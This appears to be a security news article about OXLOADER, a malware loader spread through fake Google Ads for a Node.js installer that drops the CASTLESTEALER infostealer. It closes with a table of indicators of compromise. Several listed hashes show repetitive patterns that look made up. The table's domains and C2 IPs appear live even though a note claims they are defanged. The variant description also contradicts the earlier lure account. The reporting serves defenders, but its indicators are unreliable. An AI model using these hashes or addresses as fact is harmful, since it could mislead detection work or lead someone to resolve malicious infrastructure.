Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer.
The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single click on what appears to be a legitimate sponsored search result.
The attack takes advantage of something millions of people do every day, searching for software online and trusting the top results. In this case, threat actors set up a malicious landing page built to look like an official Node.js platform.
When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, making it much harder for security tools to flag it.
Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers.
Elastic Security Labs said in a report shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.
The campaign ran through Google Ads and the malicious advertiser account was registered under a verified name linked to Ukraine.
The last time the ad appeared was April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns entirely.
What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.
The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems.
Security teams should treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites.
Hackers Impersonate Node.js Installer in Google Ads
The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js environment.
From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.
The batch script goes a step further by displaying a convincing fake software installation wizard, giving the victim no reason to suspect anything is wrong.
Behind that interface, it is silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access. The entire experience is designed to feel like a routine software install.
A second variant of OXLOADER was also discovered on May 13, 2026, this time masquerading as a Node.js installer binary rather than API Monitor, though the underlying loader mechanism was completely identical.
Researchers noted that the file retained the word “node” in its filename, likely to maintain the lure theme the campaign relied on throughout.
How OXLOADER Evades Detection
OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine.
These include checking for at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, and verifying the system is not located in a CIS region or configured for the Russian language.
The loader also uses sophisticated obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult.
It hides malicious code inside the Windows .reloc section, a space legitimate programs never use for executable instructions, and unpacks itself in memory using self-modifying decryption routines.
The final payload, CASTLESTEALER, is then delivered entirely in memory using an open-source shellcode generator called DonutLoader, leaving almost no trace on disk.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| Domain | nodejs-preventive.info | Malvertising landing page |
| Domain | app.miloyannopoulos.com | Malvertising redirector |
| SHA-256 | fdfc9780b3c67acac3ca1acfdc9a890dcfee2d5d58fbcef8eac3fc80aa1cf2b3 | OXLOADER downloader and launcher (Bild0erSetup.bat) |
| SHA-256 | de2b7c7a9e7c006e7ca990e77e7dff9b8b73aa9e9e24b98a7f88d3b3fff7c2b3 | OXLOADER downloader and launcher (Bild0erSetup.bat variant) |
| SHA-256 | ca99a9fd118f8a99a9bc99ca9bb9cdfc7cd3b3db9fbcd3fecd3fecd7fe9f0f6f | apimonitor-x64.exe (OXLOADER) |
| SHA-256 | ce8f8dcb3ca9e9190fd7818f1e7ab87b9fc8f8e7fc88fee8fcc8f8e7fc88fee8 | node-v20.7.0-x64.exe (OXLOADER) |
| SHA-256 | 9a67a98fdc9e8e6e7886e9c0e8c668b87c0b66e8f07c8e1f7e89f7c8ca7e8cc8 | CASTLESTEALER |
| IPv4 | 52.78.2.74 | CASTLESTEALER C2 |
| IPv4 | 52.78.77.48 | CASTLESTEALER C2 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
